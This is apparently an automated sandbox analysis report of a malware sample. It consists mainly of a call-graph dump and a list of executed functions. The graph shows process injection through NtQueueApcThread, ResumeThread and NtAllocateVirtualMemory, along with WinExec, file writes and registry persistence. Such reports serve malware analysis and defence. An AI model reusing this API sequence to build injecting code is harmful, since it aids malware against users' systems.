77191->77200 77196 2ca89d0 20 API calls 77192->77196 77195 2ca89d0 20 API calls 77193->77195 77199 2c94860 11 API calls 77194->77199 77197 2cb8914 77195->77197 77202 2cb9ecf 77196->77202 77198 2c94860 11 API calls 77197->77198 77204 2cb8935 77198->77204 77203 2cb972f 77199->77203 77201 2c947ec 11 API calls 77200->77201 77208 2cb7d88 77201->77208 77205 2ca89d0 20 API calls 77202->77205 77206 2c947ec 11 API calls 77203->77206 77207 2c947ec 11 API calls 77204->77207 77210 2cb9f02 77205->77210 77211 2cb9766 77206->77211 77213 2cb896c 77207->77213 77209 2ca89d0 20 API calls 77208->77209 77212 2cb7dac 77209->77212 77215 2ca89d0 20 API calls 77210->77215 77216 2ca89d0 20 API calls 77211->77216 77214 2c94860 11 API calls 77212->77214 77218 2ca89d0 20 API calls 77213->77218 77224 2cb7dcd 77214->77224 77217 2cb9f35 77215->77217 77219 2cb978a 77216->77219 77220 2c94860 11 API calls 77217->77220 77221 2cb8990 77218->77221 77222 2c94860 11 API calls 77219->77222 77225 2cb9f56 77220->77225 77223 2c94860 11 API calls 77221->77223 77228 2cb97ab 77222->77228 77227 2cb89b1 77223->77227 77226 2c947ec 11 API calls 77224->77226 77229 2c947ec 11 API calls 77225->77229 77232 2cb7e04 77226->77232 77231 2c947ec 11 API calls 77227->77231 77230 2c947ec 11 API calls 77228->77230 77234 2cb9f8d 77229->77234 77235 2cb97e2 77230->77235 77237 2cb89e8 77231->77237 77233 2ca89d0 20 API calls 77232->77233 77236 2cb7e28 77233->77236 77239 2ca89d0 20 API calls 77234->77239 77240 2ca89d0 20 API calls 77235->77240 77903 2ca5aec 42 API calls 77236->77903 77243 2ca89d0 20 API calls 77237->77243 77242 2cb9fb1 77239->77242 77244 2cb9806 77240->77244 77246 2c94860 11 API calls 77242->77246 77247 2cb8a0c 77243->77247 77913 2c97e5c 77244->77913 77245 2cb7e54 77254 2c94bcc 11 API calls 77245->77254 77259 2cb9fd2 77246->77259 77742 2cad164 77247->77742 77252 2cb9818 77256 2c94860 11 API calls 77252->77256 77253 2cb9aef 77257 2c94860 11 API calls 77253->77257 77258 2cb7e69 77254->77258 77255 2c94860 11 API calls 77262 2cb8a46 77255->77262 77263 2cb9839 77256->77263 77264 2cb9b10 77257->77264 77260 2c94860 11 API calls 77258->77260 77261 2c947ec 11 API calls 77259->77261 77265 2cb7e8a 77260->77265 77269 2cba009 77261->77269 77266 2c947ec 11 API calls 77262->77266 77267 2c947ec 11 API calls 77263->77267 77268 2c947ec 11 API calls 77264->77268 77270 2c947ec 11 API calls 77265->77270 77273 2cb8a7d 77266->77273 77274 2cb9870 77267->77274 77275 2cb9b47 77268->77275 77271 2ca89d0 20 API calls 77269->77271 77277 2cb7ec1 77270->77277 77272 2cba02d 77271->77272 77276 2c94860 11 API calls 77272->77276 77278 2ca89d0 20 API calls 77273->77278 77279 2ca89d0 20 API calls 77274->77279 77280 2ca89d0 20 API calls 77275->77280 77289 2cba04e 77276->77289 77284 2ca89d0 20 API calls 77277->77284 77281 2cb8aa1 77278->77281 77282 2cb9894 77279->77282 77283 2cb9b6b 77280->77283 77285 2c94860 11 API calls 77281->77285 77286 2c94860 11 API calls 77282->77286 77287 2c94860 11 API calls 77283->77287 77288 2cb7ee5 77284->77288 77291 2cb8ac2 77285->77291 77295 2cb98b5 77286->77295 77293 2cb9b8c 77287->77293 77292 2c949f8 11 API calls 77288->77292 77290 2c947ec 11 API calls 77289->77290 77301 2cba085 77290->77301 77297 2c947ec 11 API calls 77291->77297 77294 2cb7f02 77292->77294 77299 2c947ec 11 API calls 77293->77299 77904 2ca7e50 17 API calls 77294->77904 77298 2c947ec 11 API calls 77295->77298 77304 2cb8af9 77297->77304 77305 2cb98ec 77298->77305 77306 2cb9bc3 77299->77306 77300 2cb7f08 77302 2c94860 11 API calls 77300->77302 77303 2ca89d0 20 API calls 77301->77303 77307 2cb7f29 77302->77307 77311 2cba0a9 77303->77311 77308 2ca89d0 20 API calls 77304->77308 77309 2ca89d0 20 API calls 77305->77309 77310 2ca89d0 20 API calls 77306->77310 77315 2c947ec 11 API calls 77307->77315 77312 2cb8b1d 77308->77312 77313 2cb9910 77309->77313 77314 2cb9be7 77310->77314 77319 2ca89d0 20 API calls 77311->77319 77316 2c94860 11 API calls 77312->77316 77317 2c94860 11 API calls 77313->77317 77318 2c94860 11 API calls 77314->77318 77320 2cb7f60 77315->77320 77321 2cb8b3e 77316->77321 77322 2cb9931 77317->77322 77323 2cb9c08 77318->77323 77324 2cba0dc 77319->77324 77326 2ca89d0 20 API calls 77320->77326 77325 2c947ec 11 API calls 77321->77325 77330 2c947ec 11 API calls 77322->77330 77327 2c947ec 11 API calls 77323->77327 77329 2ca89d0 20 API calls 77324->77329 77332 2cb8b75 77325->77332 77328 2cb7f84 77326->77328 77334 2cb9c3f 77327->77334 77331 2c94860 11 API calls 77328->77331 77335 2cba10f 77329->77335 77333 2cb9968 77330->77333 77336 2cb7fa5 77331->77336 77337 2ca89d0 20 API calls 77332->77337 77338 2ca89d0 20 API calls 77333->77338 77339 2ca89d0 20 API calls 77334->77339 77340 2ca89d0 20 API calls 77335->77340 77344 2c947ec 11 API calls 77336->77344 77341 2cb8b99 77337->77341 77342 2cb998c 77338->77342 77343 2cb9c63 77339->77343 77352 2cba142 77340->77352 77345 2cb8bb9 77341->77345 77878 2ca8730 77341->77878 77917 2cae358 77342->77917 77347 2c94860 11 API calls 77343->77347 77354 2cb7fdc 77344->77354 77349 2c94860 11 API calls 77345->77349 77356 2cb9c84 77347->77356 77358 2cb8bda 77349->77358 77351 2c94530 11 API calls 77353 2cb99b1 77351->77353 77357 2ca89d0 20 API calls 77352->77357 77355 2c94860 11 API calls 77353->77355 77359 2ca89d0 20 API calls 77354->77359 77365 2cb99d2 77355->77365 77361 2c947ec 11 API calls 77356->77361 77364 2cba175 77357->77364 77360 2c947ec 11 API calls 77358->77360 77362 2cb8000 77359->77362 77369 2cb8c11 77360->77369 77367 2cb9cbb 77361->77367 77363 2c94860 11 API calls 77362->77363 77370 2cb8021 77363->77370 77368 2ca89d0 20 API calls 77364->77368 77366 2c947ec 11 API calls 77365->77366 77378 2cb9a09 77366->77378 77372 2ca89d0 20 API calls 77367->77372 77371 2cba1a8 77368->77371 77374 2ca89d0 20 API calls 77369->77374 77376 2c947ec 11 API calls 77370->77376 77373 2c94860 11 API calls 77371->77373 77375 2cb9cdf 77372->77375 77384 2cba1c9 77373->77384 77377 2cb8c35 77374->77377 77379 2c949f8 11 API calls 77375->77379 77386 2cb8058 77376->77386 77380 2c94860 11 API calls 77377->77380 77382 2ca89d0 20 API calls 77378->77382 77381 2cb9ce9 77379->77381 77389 2cb8c56 77380->77389 77937 2ca8d70 31 API calls 77381->77937 77385 2cb9a2d 77382->77385 77388 2c947ec 11 API calls 77384->77388 77387 2c94860 11 API calls 77385->77387 77390 2ca89d0 20 API calls 77386->77390 77394 2cb9a4e 77387->77394 77395 2cba200 77388->77395 77392 2c947ec 11 API calls 77389->77392 77391 2cb807c 77390->77391 77393 2c94860 11 API calls 77391->77393 77397 2cb8c8d 77392->77397 77399 2cb809d 77393->77399 77398 2c947ec 11 API calls 77394->77398 77396 2ca89d0 20 API calls 77395->77396 77400 2cba224 77396->77400 77402 2ca89d0 20 API calls 77397->77402 77405 2cb9a85 77398->77405 77403 2c947ec 11 API calls 77399->77403 77401 2c94860 11 API calls 77400->77401 77408 2cba245 77401->77408 77404 2cb8cb1 77402->77404 77409 2cb80d4 77403->77409 77406 2c94860 11 API calls 77404->77406 77407 2ca89d0 20 API calls 77405->77407 77411 2cb8cd2 77406->77411 77417 2cb9aa9 77407->77417 77410 2c947ec 11 API calls 77408->77410 77412 2ca89d0 20 API calls 77409->77412 77416 2cba27c 77410->77416 77414 2c947ec 11 API calls 77411->77414 77413 2cb80f8 77412->77413 77905 2cab118 39 API calls 77413->77905 77418 2cb8d09 77414->77418 77420 2ca89d0 20 API calls 77416->77420 77922 2cadc8c 77417->77922 77422 2ca89d0 20 API calls 77418->77422 77424 2cba2a0 77420->77424 77421 2cb8109 77423 2cb8d2d ResumeThread 77422->77423 77425 2c94860 11 API calls 77423->77425 77426 2ca89d0 20 API calls 77424->77426 77429 2cb8d59 77425->77429 77427 2cba2d3 77426->77427 77428 2c94860 11 API calls 77427->77428 77431 2cba2f4 77428->77431 77430 2c947ec 11 API calls 77429->77430 77433 2cb8d90 77430->77433 77432 2c947ec 11 API calls 77431->77432 77436 2cba32b 77432->77436 77434 2ca89d0 20 API calls 77433->77434 77435 2cb8db4 77434->77435 77437 2c94860 11 API calls 77435->77437 77438 2ca89d0 20 API calls 77436->77438 77441 2cb8dd5 77437->77441 77439 2cba34f 77438->77439 77440 2c94860 11 API calls 77439->77440 77443 2cba370 77440->77443 77442 2c947ec 11 API calls 77441->77442 77445 2cb8e0c 77442->77445 77444 2c947ec 11 API calls 77443->77444 77449 2cba3a7 77444->77449 77446 2ca89d0 20 API calls 77445->77446 77447 2cb8e30 77446->77447 77448 2c94860 11 API calls 77447->77448 77453 2cb8e51 77448->77453 77450 2ca89d0 20 API calls 77449->77450 77451 2cba3cb 77450->77451 77452 2c94860 11 API calls 77451->77452 77455 2cba3ec 77452->77455 77454 2c947ec 11 API calls 77453->77454 77457 2cb8e88 77454->77457 77456 2c947ec 11 API calls 77455->77456 77460 2cba423 77456->77460 77458 2ca89d0 20 API calls 77457->77458 77459 2cb8eac CloseHandle 77458->77459 77461 2c94860 11 API calls 77459->77461 77462 2ca89d0 20 API calls 77460->77462 77463 2cb8ed8 77461->77463 77464 2cba447 77462->77464 77465 2c947ec 11 API calls 77463->77465 77466 2ca89d0 20 API calls 77464->77466 77467 2cb8f0f 77465->77467 77468 2cba47a 77466->77468 77469 2ca89d0 20 API calls 77467->77469 77471 2ca89d0 20 API calls 77468->77471 77470 2cb8f33 77469->77470 77472 2c94860 11 API calls 77470->77472 77474 2cba4ad 77471->77474 77473 2cb8f54 77472->77473 77476 2c947ec 11 API calls 77473->77476 77475 2ca89d0 20 API calls 77474->77475 77477 2cba4e0 77475->77477 77478 2cb8f8b 77476->77478 77479 2ca89d0 20 API calls 77477->77479 77480 2ca89d0 20 API calls 77478->77480 77481 2cba513 77479->77481 77482 2cb8faf 77480->77482 77483 2c94860 11 API calls 77481->77483 77484 2c94860 11 API calls 77482->77484 77485 2cba534 77483->77485 77486 2cb8fd0 77484->77486 77488 2c947ec 11 API calls 77485->77488 77487 2c947ec 11 API calls 77486->77487 77490 2cb9007 77487->77490 77489 2cba56b 77488->77489 77491 2ca89d0 20 API calls 77489->77491 77492 2ca89d0 20 API calls 77490->77492 77493 2cba58f 77491->77493 77494 2cb902b 77492->77494 77495 2c94860 11 API calls 77493->77495 77496 2c94860 11 API calls 77494->77496 77497 2cba5b0 77495->77497 77498 2cb904c 77496->77498 77499 2c947ec 11 API calls 77497->77499 77500 2c947ec 11 API calls 77498->77500 77501 2cba5e7 77499->77501 77502 2cb9083 77500->77502 77503 2ca89d0 20 API calls 77501->77503 77504 2ca89d0 20 API calls 77502->77504 77507 2cba60b 77503->77507 77505 2cb90a7 77504->77505 77506 2c94860 11 API calls 77505->77506 77509 2cb90c8 77506->77509 77508 2ca89d0 20 API calls 77507->77508 77512 2cba63e 77508->77512 77510 2c947ec 11 API calls 77509->77510 77511 2cb90ff 77510->77511 77514 2ca89d0 20 API calls 77511->77514 77513 2ca89d0 20 API calls 77512->77513 77516 2cba671 77513->77516 77515 2cb9123 77514->77515 77517 2c94860 11 API calls 77515->77517 77518 2ca89d0 20 API calls 77516->77518 77519 2cb9144 77517->77519 77520 2cba6a4 77518->77520 77521 2c947ec 11 API calls 77519->77521 77522 2ca89d0 20 API calls 77520->77522 77523 2cb917b 77521->77523 77525 2cba6d7 77522->77525 77524 2ca89d0 20 API calls 77523->77524 77526 2cb919f 77524->77526 77527 2ca89d0 20 API calls 77525->77527 77528 2c94860 11 API calls 77526->77528 77529 2cba70a 77527->77529 77531 2cb91c0 77528->77531 77530 2c94860 11 API calls 77529->77530 77532 2cba72b 77530->77532 77533 2c947ec 11 API calls 77531->77533 77534 2c947ec 11 API calls 77532->77534 77535 2cb91f7 77533->77535 77536 2cba762 77534->77536 77537 2ca89d0 20 API calls 77535->77537 77539 2ca89d0 20 API calls 77536->77539 77538 2cb921b 77537->77538 77883 2ca894c LoadLibraryW 77538->77883 77540 2cba786 77539->77540 77541 2c94860 11 API calls 77540->77541 77546 2cba7a7 77541->77546 77544 2ca894c 21 API calls 77545 2cb924e 77544->77545 77547 2ca894c 21 API calls 77545->77547 77549 2c947ec 11 API calls 77546->77549 77548 2cb9262 77547->77548 77550 2ca894c 21 API calls 77548->77550 77554 2cba7de 77549->77554 77551 2cb9276 77550->77551 77552 2ca894c 21 API calls 77551->77552 77553 2cb928a 77552->77553 77555 2ca894c 21 API calls 77553->77555 77557 2ca89d0 20 API calls 77554->77557 77556 2cb929e CloseHandle 77555->77556 77558 2c94860 11 API calls 77556->77558 77559 2cba802 77557->77559 77561 2cb92ca 77558->77561 77560 2c94860 11 API calls 77559->77560 77562 2cba823 77560->77562 77563 2c947ec 11 API calls 77561->77563 77564 2c947ec 11 API calls 77562->77564 77565 2cb9301 77563->77565 77566 2cba85a 77564->77566 77567 2ca89d0 20 API calls 77565->77567 77569 2ca89d0 20 API calls 77566->77569 77568 2cb9325 77567->77568 77570 2c94860 11 API calls 77568->77570 77571 2cba87e 77569->77571 77573 2cb9346 77570->77573 77572 2c94860 11 API calls 77571->77572 77574 2cba89f 77572->77574 77575 2c947ec 11 API calls 77573->77575 77576 2c947ec 11 API calls 77574->77576 77577 2cb937d 77575->77577 77578 2cba8d6 77576->77578 77579 2ca89d0 20 API calls 77577->77579 77580 2ca89d0 20 API calls 77578->77580 77579->77037 77581 2cba8fa 77580->77581 77582 2c94860 11 API calls 77581->77582 77583 2cba91b 77582->77583 77584 2c947ec 11 API calls 77583->77584 77585 2cba952 77584->77585 77586 2ca89d0 20 API calls 77585->77586 77587 2cba976 77586->77587 77588 2ca89d0 20 API calls 77587->77588 77589 2cba985 77588->77589 77590 2ca89d0 20 API calls 77589->77590 77591 2cba994 77590->77591 77592 2ca89d0 20 API calls 77591->77592 77593 2cba9a3 77592->77593 77594 2ca89d0 20 API calls 77593->77594 77595 2cba9b2 77594->77595 77596 2ca89d0 20 API calls 77595->77596 77597 2cba9c1 77596->77597 77598 2ca89d0 20 API calls 77597->77598 77599 2cba9d0 77598->77599 77600 2ca89d0 20 API calls 77599->77600 77601 2cba9df 77600->77601 77602 2ca89d0 20 API calls 77601->77602 77603 2cba9ee 77602->77603 77604 2ca89d0 20 API calls 77603->77604 77605 2cba9fd 77604->77605 77606 2ca89d0 20 API calls 77605->77606 77607 2cbaa0c 77606->77607 77608 2ca89d0 20 API calls 77607->77608 77609 2cbaa1b 77608->77609 77610 2ca89d0 20 API calls 77609->77610 77611 2cbaa2a 77610->77611 77612 2ca89d0 20 API calls 77611->77612 77613 2cbaa39 77612->77613 77614 2ca89d0 20 API calls 77613->77614 77615 2cbaa48 77614->77615 77616 2ca89d0 20 API calls 77615->77616 77617 2cbaa57 77616->77617 77618 2c94860 11 API calls 77617->77618 77619 2cbaa78 77618->77619 77620 2c947ec 11 API calls 77619->77620 77621 2cbaaaf 77620->77621 77622 2ca89d0 20 API calls 77621->77622 77623 2cbaad3 77622->77623 77624 2ca89d0 20 API calls 77623->77624 77625 2cbab06 77624->77625 77626 2ca89d0 20 API calls 77625->77626 77627 2cbab39 77626->77627 77628 2ca89d0 20 API calls 77627->77628 77629 2cbab6c 77628->77629 77630 2ca89d0 20 API calls 77629->77630 77631 2cbab9f 77630->77631 77632 2ca89d0 20 API calls 77631->77632 77633 2cbabd2 77632->77633 77634 2ca89d0 20 API calls 77633->77634 77635 2cbac05 77634->77635 77636 2ca89d0 20 API calls 77635->77636 77637 2cbac38 77636->77637 77638 2c94860 11 API calls 77637->77638 77639 2cbac59 77638->77639 77640 2c947ec 11 API calls 77639->77640 77641 2cbac90 77640->77641 77642 2ca89d0 20 API calls 77641->77642 77643 2cbacb4 77642->77643 77644 2c94860 11 API calls 77643->77644 77645 2cbacd5 77644->77645 77646 2c947ec 11 API calls 77645->77646 77647 2cbad0c 77646->77647 77648 2ca89d0 20 API calls 77647->77648 77649 2cbad30 77648->77649 77650 2c94860 11 API calls 77649->77650 77651 2cbad51 77650->77651 77652 2c947ec 11 API calls 77651->77652 77653 2cbad88 77652->77653 77654 2ca89d0 20 API calls 77653->77654 77655 2cbadac 77654->77655 77656 2ca89d0 20 API calls 77655->77656 77657 2cbaddf 77656->77657 77658 2ca89d0 20 API calls 77657->77658 77659 2cbae12 77658->77659 77660 2ca89d0 20 API calls 77659->77660 77661 2cbae45 77660->77661 77662 2ca89d0 20 API calls 77661->77662 77663 2cbae78 77662->77663 77664 2ca89d0 20 API calls 77663->77664 77665 2cbaeab 77664->77665 77666 2ca89d0 20 API calls 77665->77666 77667 2cbaede 77666->77667 77668 2ca89d0 20 API calls 77667->77668 77669 2cbaf11 77668->77669 77670 2ca89d0 20 API calls 77669->77670 77671 2cbaf44 77670->77671 77672 2ca89d0 20 API calls 77671->77672 77673 2cbaf77 77672->77673 77674 2ca89d0 20 API calls 77673->77674 77675 2cbafaa 77674->77675 77676 2ca89d0 20 API calls 77675->77676 77677 2cbafdd 77676->77677 77678 2ca89d0 20 API calls 77677->77678 77679 2cbb010 77678->77679 77680 2ca89d0 20 API calls 77679->77680 77681 2cbb043 77680->77681 77682 2ca89d0 20 API calls 77681->77682 77683 2cbb076 77682->77683 77684 2ca89d0 20 API calls 77683->77684 77685 2cbb0a9 77684->77685 77686 2ca89d0 20 API calls 77685->77686 77687 2cbb0dc 77686->77687 77688 2ca89d0 20 API calls 77687->77688 77689 2cbb10f 77688->77689 77690 2ca89d0 20 API calls 77689->77690 77691 2cbb142 77690->77691 77692 2ca89d0 20 API calls 77691->77692 77693 2cbb175 77692->77693 77694 2ca8338 18 API calls 77693->77694 77695 2cbb184 77694->77695 77696 2c94860 11 API calls 77695->77696 77697 2cbb1a5 77696->77697 77698 2c947ec 11 API calls 77697->77698 77699 2cbb1dc 77698->77699 77700 2ca89d0 20 API calls 77699->77700 77701 2cbb200 77700->77701 77702 2c94860 11 API calls 77701->77702 77703 2cbb221 77702->77703 77704 2c947ec 11 API calls 77703->77704 77705 2cbb258 77704->77705 77706 2ca89d0 20 API calls 77705->77706 77707 2cbb27c 77706->77707 77708 2c94860 11 API calls 77707->77708 77709 2cbb29d 77708->77709 77710 2c947ec 11 API calls 77709->77710 77711 2cbb2d4 77710->77711 77712 2ca89d0 20 API calls 77711->77712 77713 2cbb2f8 ExitProcess 77712->77713 77720 2cae114 77714->77720 77715 2cae197 77716 2c944dc 11 API calls 77715->77716 77717 2cae19f 77716->77717 77719 2c94530 11 API calls 77717->77719 77718 2c949f8 11 API calls 77718->77720 77721 2cae1aa 77719->77721 77720->77715 77720->77718 77722 2c94500 11 API calls 77721->77722 77723 2cae1c4 77722->77723 77723->76927 77725 2caf22b 77724->77725 77726 2caf256 RegOpenKeyA 77725->77726 77727 2caf264 77726->77727 77728 2c949f8 11 API calls 77727->77728 77729 2caf27c 77728->77729 77730 2caf289 RegSetValueExA RegCloseKey 77729->77730 77731 2caf2ad 77730->77731 77732 2c94500 11 API calls 77731->77732 77733 2caf2ba 77732->77733 77734 2c944dc 11 API calls 77733->77734 77735 2caf2c2 77734->77735 77735->76930 77737 2c949ac 77736->77737 77738 2c949e7 77737->77738 77739 2c945a0 11 API calls 77737->77739 77738->77169 77740 2c949c3 77739->77740 77740->77738 77938 2c92c2c 11 API calls 77740->77938 77743 2cad16d 77742->77743 77743->77743 77744 2c94860 11 API calls 77743->77744 77745 2cad1af 77744->77745 77746 2c947ec 11 API calls 77745->77746 77747 2cad1d4 77746->77747 77748 2ca89d0 20 API calls 77747->77748 77749 2cad1ef 77748->77749 77750 2c94860 11 API calls 77749->77750 77751 2cad208 77750->77751 77752 2c947ec 11 API calls 77751->77752 77753 2cad22d 77752->77753 77754 2ca89d0 20 API calls 77753->77754 77755 2cad248 77754->77755 77756 2c94860 11 API calls 77755->77756 77757 2cad261 77756->77757 77758 2c947ec 11 API calls 77757->77758 77759 2cad286 77758->77759 77760 2ca89d0 20 API calls 77759->77760 77761 2cad2a1 77760->77761 77762 2c94860 11 API calls 77761->77762 77763 2cad2ba 77762->77763 77764 2c947ec 11 API calls 77763->77764 77765 2cad2df 77764->77765 77766 2ca89d0 20 API calls 77765->77766 77767 2cad2fa 77766->77767 77768 2c94860 11 API calls 77767->77768 77769 2cad313 77768->77769 77770 2c947ec 11 API calls 77769->77770 77771 2cad338 77770->77771 77772 2ca89d0 20 API calls 77771->77772 77773 2cad353 77772->77773 77774 2c94860 11 API calls 77773->77774 77775 2cad36c 77774->77775 77776 2c947ec 11 API calls 77775->77776 77777 2cad391 77776->77777 77778 2ca89d0 20 API calls 77777->77778 77779 2cad3ac 77778->77779 77780 2c94860 11 API calls 77779->77780 77781 2cad3c5 77780->77781 77782 2c947ec 11 API calls 77781->77782 77783 2cad3ea 77782->77783 77784 2ca89d0 20 API calls 77783->77784 77785 2cad405 77784->77785 77786 2c94860 11 API calls 77785->77786 77787 2cad421 77786->77787 77788 2c947ec 11 API calls 77787->77788 77789 2cad44c 77788->77789 77790 2ca89d0 20 API calls 77789->77790 77791 2cad470 77790->77791 77792 2c94860 11 API calls 77791->77792 77793 2cad48c 77792->77793 77794 2c947ec 11 API calls 77793->77794 77795 2cad4bd 77794->77795 77796 2ca89d0 20 API calls 77795->77796 77797 2cad4e1 77796->77797 77798 2cad558 77797->77798 77800 2c94860 11 API calls 77797->77800 77799 2c94860 11 API calls 77798->77799 77801 2cad574 77799->77801 77802 2cad503 77800->77802 77803 2c947ec 11 API calls 77801->77803 77804 2c947ec 11 API calls 77802->77804 77806 2cad5a5 77803->77806 77805 2cad534 77804->77805 77808 2ca89d0 20 API calls 77805->77808 77807 2ca89d0 20 API calls 77806->77807 77809 2cad5c9 77807->77809 77808->77798 77810 2c94860 11 API calls 77809->77810 77811 2cad5e5 77810->77811 77812 2c947ec 11 API calls 77811->77812 77813 2cad616 77812->77813 77814 2ca89d0 20 API calls 77813->77814 77815 2cad63a 77814->77815 77816 2c94860 11 API calls 77815->77816 77817 2cad656 77816->77817 77818 2c947ec 11 API calls 77817->77818 77819 2cad687 77818->77819 77820 2ca89d0 20 API calls 77819->77820 77821 2cad6ab 77820->77821 77822 2c92ee0 2 API calls 77821->77822 77823 2cad6b0 77822->77823 77824 2c94860 11 API calls 77823->77824 77825 2cad6e0 77824->77825 77826 2c947ec 11 API calls 77825->77826 77827 2cad711 77826->77827 77828 2ca89d0 20 API calls 77827->77828 77829 2cad735 77828->77829 77830 2c94860 11 API calls 77829->77830 77831 2cad751 77830->77831 77832 2c947ec 11 API calls 77831->77832 77833 2cad782 77832->77833 77834 2ca89d0 20 API calls 77833->77834 77835 2cad7a6 77834->77835 77939 2ca7a2c 77835->77939 77838 2cad835 77840 2c94860 11 API calls 77838->77840 77839 2c94860 11 API calls 77842 2cad7e0 77839->77842 77841 2cad851 77840->77841 77843 2c947ec 11 API calls 77841->77843 77844 2c947ec 11 API calls 77842->77844 77845 2cad882 77843->77845 77846 2cad811 77844->77846 77847 2ca89d0 20 API calls 77845->77847 77848 2ca89d0 20 API calls 77846->77848 77849 2cad8a6 77847->77849 77848->77838 77850 2c94860 11 API calls 77849->77850 77851 2cad8c2 77850->77851 77852 2c947ec 11 API calls 77851->77852 77853 2cad8f3 77852->77853 77854 2ca89d0 20 API calls 77853->77854 77855 2cad917 77854->77855 77856 2ca7d78 18 API calls 77855->77856 77857 2cad92f 77856->77857 77858 2c94860 11 API calls 77857->77858 77859 2cad94b 77858->77859 77860 2c947ec 11 API calls 77859->77860 77861 2cad97c 77860->77861 77862 2ca89d0 20 API calls 77861->77862 77863 2cad9a0 77862->77863 77864 2c94860 11 API calls 77863->77864 77865 2cad9bc 77864->77865 77866 2c947ec 11 API calls 77865->77866 77867 2cad9ed 77866->77867 77868 2ca89d0 20 API calls 77867->77868 77869 2cada11 77868->77869 77870 2c94860 11 API calls 77869->77870 77871 2cada2d 77870->77871 77872 2c947ec 11 API calls 77871->77872 77873 2cada5e 77872->77873 77874 2ca89d0 20 API calls 77873->77874 77875 2cada82 77874->77875 77876 2c94500 11 API calls 77875->77876 77877 2cadaa1 77876->77877 77877->77255 77879 2ca81cc 17 API calls 77878->77879 77880 2ca8742 77879->77880 77881 2ca8274 15 API calls 77880->77881 77882 2ca8748 NtQueueApcThread 77881->77882 77882->77345 77884 2ca89bb 77883->77884 77885 2ca8973 GetProcAddress 77883->77885 77884->77544 77886 2ca898d 77885->77886 77887 2ca89b0 FreeLibrary 77885->77887 77888 2ca7d78 18 API calls 77886->77888 77887->77884 77889 2ca89a5 77888->77889 77889->77887 77891 2c94530 11 API calls 77890->77891 77892 2ca85df 77891->77892 77893 2c94860 11 API calls 77892->77893 77894 2ca85fe 77893->77894 77895 2ca81cc 17 API calls 77894->77895 77896 2ca8611 77895->77896 77897 2ca8274 15 API calls 77896->77897 77898 2ca8617 WinExec 77897->77898 77899 2ca8639 77898->77899 77900 2c944dc 11 API calls 77899->77900 77901 2ca8641 77900->77901 77901->77028 77902->77087 77903->77245 77904->77300 77905->77421 77908 2caf0b9 77906->77908 77907 2caf0e5 77910 2c944dc 11 API calls 77907->77910 77908->77907 77953 2c946c4 11 API calls 77908->77953 77954 2c94530 11 API calls 77908->77954 77911 2caf0fa 77910->77911 77911->77188 77955 2c949a0 77913->77955 77916 2c97e71 77916->77252 77916->77253 77918 2c94bcc 11 API calls 77917->77918 77919 2cae370 77918->77919 77920 2cae391 77919->77920 77921 2c949f8 11 API calls 77919->77921 77920->77351 77921->77919 77923 2cadca2 77922->77923 77957 2c94f20 77923->77957 77925 2cadcaa 77926 2cadcca RtlDosPathNameToNtPathName_U 77925->77926 77961 2cadbdc 77926->77961 77928 2cadce6 NtCreateFile 77929 2cadd11 77928->77929 77930 2c949f8 11 API calls 77929->77930 77931 2cadd23 NtWriteFile NtClose 77930->77931 77932 2cadd4d 77931->77932 77962 2c94c60 77932->77962 77935 2c944dc 11 API calls 77936 2cadd5d 77935->77936 77936->77253 77937->77098 77938->77738 77940 2c94530 11 API calls 77939->77940 77941 2ca7a51 77940->77941 77942 2ca798c 12 API calls 77941->77942 77943 2ca7a5e 77942->77943 77944 2c947ec 11 API calls 77943->77944 77945 2ca7a6b 77944->77945 77946 2ca81cc 17 API calls 77945->77946 77947 2ca7a7e 77946->77947 77948 2ca8274 15 API calls 77947->77948 77949 2ca7a84 NtAllocateVirtualMemory 77948->77949 77950 2ca7ab5 77949->77950 77951 2c94500 11 API calls 77950->77951 77952 2ca7ac2 77951->77952 77952->77838 77952->77839 77953->77908 77954->77908 77956 2c949a4 GetFileAttributesA 77955->77956 77956->77916 77958 2c94f26 SysAllocStringLen 77957->77958 77959 2c94f3c 77957->77959 77958->77959 77960 2c94c30 77958->77960 77959->77925 77960->77957 77961->77928 77963 2c94c74 77962->77963 77964 2c94c66 SysFreeString 77962->77964 77963->77935 77964->77963

                                                                      Executed Functions

                                                                      Function 02C95ACC Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184registrystringlibraryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 9232 2c95acc-2c95b0d GetModuleFileNameA RegOpenKeyExA 9233 2c95b4f-2c95b92 call 2c95908 RegQueryValueExA 9232->9233 9234 2c95b0f-2c95b2b RegOpenKeyExA 9232->9234 9241 2c95b94-2c95bb0 RegQueryValueExA 9233->9241 9242 2c95bb6-2c95bd0 RegCloseKey 9233->9242 9234->9233 9235 2c95b2d-2c95b49 RegOpenKeyExA 9234->9235 9235->9233 9237 2c95bd8-2c95c09 lstrcpynA GetThreadLocale GetLocaleInfoA 9235->9237 9239 2c95c0f-2c95c13 9237->9239 9240 2c95cf2-2c95cf9 9237->9240 9244 2c95c1f-2c95c35 lstrlenA 9239->9244 9245 2c95c15-2c95c19 9239->9245 9241->9242 9246 2c95bb2 9241->9246 9247 2c95c38-2c95c3b 9244->9247 9245->9240 9245->9244 9246->9242 9248 2c95c3d-2c95c45 9247->9248 9249 2c95c47-2c95c4f 9247->9249 9248->9249 9250 2c95c37 9248->9250 9249->9240 9251 2c95c55-2c95c5a 9249->9251 9250->9247 9252 2c95c5c-2c95c82 lstrcpynA LoadLibraryExA 9251->9252 9253 2c95c84-2c95c86 9251->9253 9252->9253 9253->9240 9254 2c95c88-2c95c8c 9253->9254 9254->9240 9255 2c95c8e-2c95cbe lstrcpynA LoadLibraryExA 9254->9255 9255->9240 9256 2c95cc0-2c95cf0 lstrcpynA LoadLibraryExA 9255->9256 9256->9240
                                                                      APIs
                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02C90000,02CBE790), ref: 02C95AE8
                                                                      • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02C90000,02CBE790), ref: 02C95B06
                                                                      • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02C90000,02CBE790), ref: 02C95B24
                                                                      • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02C95B42
